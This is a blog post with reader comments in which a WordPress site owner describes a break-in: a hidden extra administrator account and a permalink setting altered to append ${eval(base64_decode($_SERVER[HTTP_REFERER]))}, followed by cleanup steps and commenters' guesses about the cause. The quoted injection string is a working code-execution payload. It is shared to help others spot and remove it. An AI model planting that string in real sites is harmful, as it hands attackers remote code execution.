eval(base64_decode(…)) in permalinks

I figure my blog got hacked. It’s my own fault for being too lazy to upgrade, but I thought I’d describe the symptoms, so other people who have the same problem have something to go by. I have since removed all the malicious stuff (at least I think I have) and upgraded to version 2.8.4.

Since this morning, I noticed that my “permalinks” setting had been customised (I use the default ?p=123-style URLs, normally) and for some reason, there was something like: ${eval(base64_decode($_SERVER[HTTP_REFERER]))} appended to each of them. Which caused them not to work, obviously.

When I looked at my users list, I noticed something odd: at the top it said Administrators (2), but only my own account was listed as administrator. I took a look at the database and seemingly, a user called “JohnFisher76” also had admin rights. I’d had a few spam registrations before so I hadn’t paid attention to this. I wish I had…

I haven’t bothered to try and interpret what this does, but I guess it’s used to hide the fact that there is another administrator in the admin panel. I don’t know how this user managed to acquire admin rights though.

Anyway, shame on me for not upgrading. To fix it, I removed the user (manually, in the database, tables user and usermeta), got rid of the funky permalink stuff, and then upgraded to 2.8.4 as fast as I could. As far as I can tell that’s fixed it. I hope this thing hasn’t left anything else behind that could come back to haunt me…

I just set it back to the default setting. Technically, I did remove the appended stuff in the database manually before that, but I don’t think that had any effect.

At any rate it can’t hurt to search the “options” table for any reference to “eval” or “base64” and clean that up. It also appeared in a row in “options” called “rewrite_rules”, I think. But that disappeared once I changed the setting back.

As I said, I don’t know if this has caused any other damage. The changed permalink setting rather seems like it is put in place to make further hacks easier to apply, although I have no idea how.

My site got nailed too. I didn’t think of anything when I had a couple “admin” users added to the site. Thought it was just spam. But I had two additional “admins” with “contributer” status and they were able to change the Permalinks url structure. Argghh.

We also offer a free WP security plugin, to lockdown all versions of wordpress. This works in 98% of the cases (download here: http://wordpress.org/extend/plugins/wp-secure-by-sitesecuritymonitorcom/ ) – however in this case, if you are hosted w/ godaddy, since the attacks are from the inside (we suspect in this case a cracked apache.conf that is injecting malware during execution) – the plugin wouldn’t help much

The current hack involves injecting base64 code into all .php files, not just WordPress. I believe the leading theory at this point is that malware is exploiting passwords that are sent “in the clear” via FTP clients. The solution in that case would be to switch to using SFTP. Use FileZilla if you’re on a PC or Cyberduck if you’re on a Mac.